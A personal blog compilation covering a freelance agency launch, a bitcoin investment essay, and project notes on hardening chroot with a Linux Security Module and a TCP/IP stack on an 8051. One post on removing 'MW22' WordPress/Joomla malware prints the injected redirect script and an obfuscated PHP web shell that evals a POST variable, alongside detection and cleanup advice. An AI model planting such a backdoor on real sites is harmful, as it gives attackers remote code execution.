Coders.Ink, Entrepreneurship, Freelance, Wordpress

My Freelance Agency / Startup: Coders.Ink

As some of you might have noticed from my resume/posts, I have been freelancing during my free time in college & school(for almost 6 years now). I just recently decided to take it to the next step by creating a freelance agency that does a lot of “outsourcable”(for lack of a better term) work, like general/regular web dev, system administration, penetration testing & malware removal, scraping etc.

I decided to take this next step because right now, academic commitments are at a low, and I thought I would fill up the slack by occupying myself with something that would require little to zero capital investment and still could provide me with a steep learning curve. And well, if it became successful, all the more better, although the chances for that are quite small due to the paucity of time, investment and connections. It has proved to be quite a handful, as you might imagine. We are young, dynamic, small and hungry(somewhat malnourished to be honest).

If you came across any leads or opportunities that might fit what we do, or if you came across individuals/entities that might need our services, could you please forward them to us? We are established at 

Warning: Further paragraphs contain the obligatory BTS stuff. This announcement should have come a long time ago, but I was quite busy. And hesitant to call myself an entrepreneur. I would still like to think of myself of much more an opportunist who saw a fulfillment of his personal values by doing this. I haven’t burnt any of my bridges, I haven’t been through the struggle of seed rounds and pitching, I haven’t been through the struggle of working in fields as a farmhand, I haven’t faced any food shortages(in fact, I should if I need to shed weight), I have a very good roof over my head, and a good bed below myself. I also didn’t feel the need to dropout of my college. Instead, I have found satisfaction/excitement in studying for a lot of my courses, and thankfully have a placement in one of the world’s best & biggest tech companies with an epic work culture and a very good package, with the only downside being lack of explosive growth. I also have a better than average/good GPA and take a delight in academic pursuits like research, even though I don’t see myself as a researcher in the future. I don’t intend for this to feel like a repetition of a certain Greek hunter named Narcissus. I am just stating that I lack a lot of credentials/causes that a lot of entrepreneurs have.

The only thing I stand to lose from this venture is success in this venture. That is my only skin in the game, PERIOD. Hence, it follows that my desire for success in this venture has to be a lot, enough to compensate or even overcompensate for the lack of other causes.

Also, let me state the disadvantages or shortcomings that I am starting with. Disclaimer: Don’t get me wrong; I don’t prioritize the feeling of being honest about my failures/shortcomings over being successful, and neither do I let the former be an excuse for the latter. However, I don’t think my desire for success will grow any less when I am upfront about those of my disadvantages that I can’t do anything about. I, for one, have ZERO contacts within the Indian software industry. Or the software industry of any country at that. I don’t have any prior experience with advertising or marketing, which is necessary when you are building something for scratch. I also have just 4 months to make this venture successful for this venture to be a part of my life in the future. I am sorry to the purists, but the losses that I will incur after making an almost 100% statistical failure as my main source of income for the entirety of my life are too much for me to bear.

Building a solid brand takes time, as does establishing yourself, learning about various technologies and gaining clients. I probably am not giving this the time it deserves. Another major shortcoming of mine is the sudden disappearance of the assumption of my premise (sorry for the assumption-ception). My original model was that there are a lot of employers on freelancing platforms like upwork (the supply) and there is a lot of demand for such jobs by college kids in India. My original reason for starting this startup/agency was spying an opportunity in fulfilling an unfulfilled supply-demand relationship. What I found out was that there is no supply, or at least, very less supply. My original plan did not involve “building the brand from scratch” part. Since I was already established on upwork with long-term clients, excellent reviews, ratings and work success rates, and since I sincerely believed that there was a high supply, I was of the thought that this would be easy. As always, the actual ground truth is FAR from the imagination.

So, what have I been doing to prevent these default shortcomings of mine(that I have no control over) from becoming excuses? I am learning advertising and marketing in an informal DIY manner from comments & posts by redditors and other freelancers who have already created their brands. The path normally takes a lot of time, something which I haven’t given myself a lot of. I will be trying to achieve something very difficult in a very short period of time. My brain tells me in third-person that we have our very first candidate for the post of the steep learning curve.

So now that I have prepared my bosom and appointed you Portia, …. okay, not a well thought out analogy. Simply, if you come across any leads or opportunities that might fit what we do, or if you come across individuals/entities that might need our services, PLEASE contact us.

Bitcoins, Crypto-currencies, Finance, Investment

Bitcoin as a financial tool for investment

Yes, I know that bitcoin is a currency, but every currency can be treated as a commodity or a financial tool when multiple currencies are present in the system. Now that we’ve cleared that up, let’s move on to trying to gauge its investment potential.

Bitcoin’s volatility is not news. The first major bump was back in 2011/2012 when the value rose to more than 600USD. In 2013, Bitcoin even traded at 1200 USD, almost the value of 1 oz of gold at that time. Lightning bursts of more than 100% often have been recorded in just a few days. All this volatility got a lot of people excited and wondering whether to invest in bitcoins. However, the bursts are accompanied by lows too. Which is why it is not accepted as a major currency by a lot of vendors.

These bursts led people to believe that it bitcoins are a good investment tool. Most of them got over their illusions quite early on, but even now, you can see some newbies on the various forums and subreddits inquiring about how to make money from bitcoins and other altcoins.

I will try to cover just a few avenues that might appear that they will end up giving major profits, but actually don’t:

  1. Forex b/w various altcoins/crypto-currencies: This involves currency exchange between various altocoins like bitcoins, dogecoins, litecoins, peercoins etc. Certain exchanges exist that allow this. The volatility might seem to be a very good forex opportunity but it isn’t because the value of most popular altcoins are pegged to the value of btc itself.
  2. Mining: Most major altcoins now hold little/no rewards when it comes to mining. The mining market itself was heavily skewed towards early-adopters, and now most altcoin mining requires dedicated hardware like ASIC chips etc. The cost of entry is VERY high, and unfortunately the recurrent earnings are not. The altcoins which have high rewards(in terms of that specific currency) are the ones that are just starting out, and thus involve quite a risk(one of the fundamentals of all investment: you cannot have high rewards/returns without high risk in a free market), as they can be scams. Multiple pump & dump/ponzi schemes are in operation and quite a lot have been discovered.
  3. Forex b/w USD/fiat currencies and altcoins/crypto-currencies: Fiat currencies are currencies that are backed by governments, like USD, the euro or INR for example. Given the fact that altcoins often make gains of upto 100% or more in a single day when compared to fiat-currencies, especially the USD, it again, to newbies, seems like a good investment opportunity. However, the extremely high volatility also shows 50% losses in a single day easily (the Chinese govt. banning usage of bitcoins, for ex. 600USD -> 300USD in a single day). The market is very highly unpredictable, and “timing the market”(which is already difficult in comparatively low volatility stock markets) is almost impossible.

What my point is that any kind of disciplined investment is highly difficult in the current scenario, and people who actually get involved in such avenues are more speculators than investors. Of course, a pedantic POV is that speculation, by definition, is investment but I believe that the distinction in such scenarios is quite important.

However, this does not mean that I wish ill of bitcoin, or crypto-currency in general. Mr. Satoshi Nakamoto (the pseudonym under which the author of the original paper goes by) has given us one of the most important inventions of the modern financial world, and possible, of the world itself. The decentralization, ease and high degree of anonymity(not complete) is indeed revolutionary. However, the most important conceptual impediment is the volatility itself, which is responsible for attracting a large part of the userbase. Political and competitive impediments are of course, not so simple. Absence of centralization, regulation, international compartmentalization, presence of anonymity etc. makes it highly abhorrent to the traditional political and economic systems of the world. Maybe, crypto-currencies are meant to be as a counter-balance to the current currencies. Presence of cypto-currencies is most definitely an addition to the systems of checks & balances that governments, or any powerful entity answerable to the general population needs to be under.

P.S. Not that I am professional economist myself. A hobbyist one, and if you disagree with any of my views above, please comment.

My Projects, Uncategorized

JS:MW22 jquery.min.php malware & how to remove it

So, I am a freelancer web-dev, malware removal guy, python scraping guy, joomla migration guy, wordpress guy, agency manager ….. you get the deal. Anyway, I have started noticing these “MW22” “jquery.min.php” malware more & more recently.  The footprints are mostly on wordpress and joomla sites, and the malware tries to exploit old versions of the CMSs.
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(; var base = ""; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('' + '');}

This block of text will be present in your templates’ index.php file in Joomla and header.php file in wordpress. Quite simple to remove it, right? Just remove the aforementioned offending block of code from your index.phps and everybody’s happy. Sucuri and virustotal no longer show your site as malicious/infected. You are yet again in your final glorious form of a shining knight in white armour. You have purged the realm of the darkness and are applauded by your bosses again.

Except, you are wrong. This malware leaves a TON of backdoors+php shells in every conceivable corner of your site. It not only adds new backdoor files but also modifies existing files. A typical backdoor looks like this:


<?php                                                                                                                                                                                                                                                      $lsie30 =”o46cbea_dtsp” ;$eeb4 = strtolower($lsie30[4].$lsie30[6]. $lsie30[10].$lsie30[5].$lsie30[2]. $lsie30[1] . $lsie30[7]. $lsie30[8]. $lsie30[5]. $lsie30[3].$lsie30[0].$lsie30[8].$lsie30[5] ); $lbz4= strtoupper( $lsie30[7].$lsie30[11]. $lsie30[0]. $lsie30[10].$lsie30[9]) ;if( isset( ${ $lbz4 } [‘ne9fa0d’]) ){eval ( $eeb4 ( ${$lbz4}[‘ne9fa0d’] ) ) ;}?>

This code basically searches for the existence of a POST variable with a random name in the HTTP request to this file. Once it receives such a request, it will then basically run the contents of that variable.

Hundreds of files like user.php and xml.php will be added. Random files of your website will be modified. Just do a grep -R “eval” of your website root, select malicious files and delete them. Just grepping for eval throws up a lot of false negatives, which you can’t delete/modify.

Now, harden up your system. Change passwords, look for added users, changes in groups, unidentified logins etc. Use programs that notify you whenever your web root folder content changes. If nothing is available, use a LSM kernel module if allowed. Use logs the way they were intended to be used: for analysis.

And for the love of everything that is holy, update your CMS. Allow automatic update if it is possible. Keep backups.

Special advice for wordpress users: Use Wordfence. Regular scans, etc.

PS: Want me to take a look at your website? Contact me using the Contact page.



An update on the various things I was working in the 2nd half of the year:

  • A Topic Modelling-based project to establish a search engine for law documents and precedents: Our initial aim was to use LDA to establish a set number of topics over the entire corpus, and then determine the degree a topic belongs to a particular document with (depending on the topics the work of the document the words belong to). To search, a user could simply select topics with increasing order of granularity, or paste a law document itself. In the latter case, the engine would run LDA on the pasted text, merge words of the new document in the existing topic model and then determine similar law documents/precedents based on the document’s primary documents.
  • Some modification of the chroot paper with the aim of submitting it to an ACM publication.
  • Getting placed at Microsoft IT.
  • Starting a web freelance agency( on odesk/upwork)
  • Presenting the Anti-Scraping paper at an International IEEE conference(ICACCI ’15, Kochi).
  • A JAVA based project for a distributed P2P-based secure cloud storage architecture over Java. This was a college based project and we were forced to stick to Java technologies completely. The entire system was not truly Peer to Peer as it had a centralized database that allowed tracking of files. Files were encrypted by the user’s key, then sent to the serve,r which broke it into blocks, created replicas and then stored the same on clients that were online. It was designed to be very secure, with confidentiality, authentication and integrity being ensured. Servlets were also used (we were forced to use the same), along with JAVA FX for the client UI. MVC.

Not very substantial, yes, and could be more, but damn, went to 5x more parties this semester than all of my previous semester combined. Visited more places/waterfalls and enjoyed life a little bit too much.



Progress and Responsibility: These are the two things that I have based my entire life upon, or at least, I envision that I will. A closer look will give evidence that the 2nd tenet is an abstraction of the first, albeit in a rather shaky manner: the responsibility towards progress. “Do not go gentle into that good night, Old age should burn and rave at the close of the day; Rage, Rage against the dying of the light.” is a quote oft repeated to signify how alive one should be even on the eve of death. I believe that this sentence perfectly embodies the intensity that I believe one should have for their life’s code and tenets. Not just in belief, but also in practice. Absence of intensity is sign of death. Inactivity reeks of crop ripe and ready for the Grim Reaper. A nullifying nihilism contradicts everything that is living and should be fought with fire.

Failure sometimes only serves to shore up one’s resolve. Difficulty and overwhelming odds against a person is what build the best kind of resolve. The earlier they occur, the more influence they have in forging a man’s character. The later they occur in life, the more they test that same resolve. There is nothing purer than a character being forged in the furnace of difficulty. Life is a zero-sum game, as is death. In life, the more you want, the more you sacrifice. In death, there is no exchange, thanks to the ever-present nullifying zero. Hence, one’s life is measured by the amount he sacrifices and the amount he gains. The smaller that is, the more the person’s life is death. Anybody’s life is measured in the intensity with which he believes and practices his life’s code.

Coding, Enhancing chroot, My Projects


First things first, I always need a sense of path, hence directly working with inodes is not an option.  Other hooks like file_permission are only called when files are read/written into, so that again is not a possibility. What can be done is a linkup b/w a LSM(acting on inode permission hook that gets called whenever an inode is accessed), call the script to search for the particular inode number inside the chrooted directory using ls -iR ( recursive listing with inode numbers), if found return some value, and the module caches it. Otherwise return some other value and the absence too is cached.

The chrooted directory(the benchmark against which the inode of the called application is searched) path is to be known from before.


1) try to check if the calling task’s program is inside the chrooted directory or not(hopefully takes lesser time) + necessary for the block to work perfectly
2) if yes, then go to check for the called directory/file


Also, Soln2 is pretty self-evident in itself and we block any mount inside the jail with the help of sb_mount hook. Here’s the documentation for the same:-

* @sb_mount:
 * Check permission before an object specified by @dev_name is mounted on
 * the mount point named by @nd. For an ordinary mount, @dev_name
 * identifies a device if the file system type requires a device. For a
 * remount (@flags & MS_REMOUNT), @dev_name is irrelevant. For a
 * loopback/bind mount (@flags & MS_BIND), @dev_name identifies the
 * pathname of the object being mounted.
 * @dev_name contains the name for object being mounted.
 * @path contains the path for mount point object.
 * @type contains the filesystem type.
 * @flags contains the mount flags.
 * @data contains the filesystem-specific data.
 * Return 0 if permission is granted.
Coding, Enhancing chroot

Enhancing chroot with a LSM

So, chroot was not intended to be a security feature(as pointed out by a lot of Linux stewards and who’s who) and my aim with this project is to get it as close to a container-ish as possible.

2 major vulnerabilities exist when chroot is used from the perspective of a security tool (which might be features or just not anything when used for what chroot was intended to be used):

  1. If a vulnerable program uses setuig/setgid and gains user id 0(root) during its execution, it could be used to execute fchdir with a file descriptor of a (obviously open) file outside the jail and repeated chdir()s till it returned to 0(indicating / has been reached) and then a chroot(“/”) to get everything back to normal.
  2. Users can mount a file-system inside the chrooted environment thus ending all discussion promptly.

Most sysadmins get around these .. umm occurences(being neutral), by using complicated group permissions and the ilk via DAC (which seems woefully outdated for enterprises imo) which sounds like and should be a major PITA.

I decided to mitigate these vulnerabilities (from a security perspective before you go ballistic) as my contribution to the enhancement of chroot.  Here are the various ways one could mitigate the aforesaid.

Ways to mitigate vuln1:-

  1. Cure the world of existence of vulnerable applications. Can’t+Won’t happen.
  2. Prevent such(vulnerable) applications to be run in a chrooted environment: To do this I need a program to check the binary of each application being copied in the jail which is a very inefficient way.
  3. Prevent any reference to inodes outside of the chrooted environment by root unless a specific pass-phrase (set by the root itself when chrooting is executed) is provided. (also provide associated facilities like password forgotten etc.). This seems to be the best way. In all further posts, this shall be referred as Soln1.

Ways to mitigate vuln2:

  1. Prevent mounting of anything inside chroot, unless explicitly chosen by the root to be otherwise(can be set before chroot), in which case the responsibility of patching and circumventing this vuln is on the user itself. This shall be referred to as Soln2.


Coding, My Projects

Implementation of Network Layer Protocols of TCP/IP Suite on 8051 architecture

The 8051 chip we used was a Atmel AT89S51 with a 4KB Flash and 128 bytes RAM. In fact, this created a major problem. The complete code, along with the entire parsing & LCD sub-routines presented us with the problem of using more space than present in the Flash and more data space than present in the RAM.

We implemented IP, ICMP and a simple Application Layer Message protocol over RS232 standard for serial communication. Reasons of using RS232 was simple as even the simplest of dev-boards for AT89S51/any 8051 uC come with a DB-9 Serial port coupled with a MAX232 IC(for conversion of RS232 voltage levels to TTL voltage levels). Also, this was the first time we were actually doing a proper embedded systems project, hence we decided to implement only a couple of protocols. And thankfully so, since the LCD gave us problems that nobody could predict. One night, it was working fine, the other day it wasn’t.

In the project, one end-point was a 8051 uC and the other was a Flash Magic terminal on the laptop. A major problem that we faced was that we could not directly transmit a lot of digits over the serial protocol. An example is 0, which when directly put in the SBUF is taken to be NULL (in ASCII) and hence the uC stops transmission of the same over the serial port. We had to implement an abstraction layer over the serial one to prevent that problem too.

A complete implementation of the entire TCP/IP stack over the uC would enable it to be completely conversant with the Internet.

Coding, My Projects, Random Shit, Uncategorized, Wordpress


Too busy this semester to post any proper updates, I was. An internship at a prominent tech company, around 3 diverse projects, a major major focus to improve my programming skills leading up the the ACM ICPC 1st round, in which we failed to qualify for the 2nd and a mediocre GPA were the highlights.

To the good part though: the projects. The projects were:

  • An IoT project: implementation of specific Network Layer protocols of TCP/IP suite on the Intel 8051/52 architecture-based micro-controllers over RS232 physical layer.
  • A syntactic validator for C built in lex, yacc & C.
  • The last and the most juicy, a MAC LSM(Mandatory Access Control Linux Security Module). I am still working on this one though.

All of the projects were really fulfilling. I was especially surprised at the fulfillment gained by completing the first 2, since even though Embedded Systems is a nice field, I am not really looking to further myself in the field. The syntactic validator for C was our Systems Programming subject and again was a very challenging project. More to follow on the 1st & 3rd.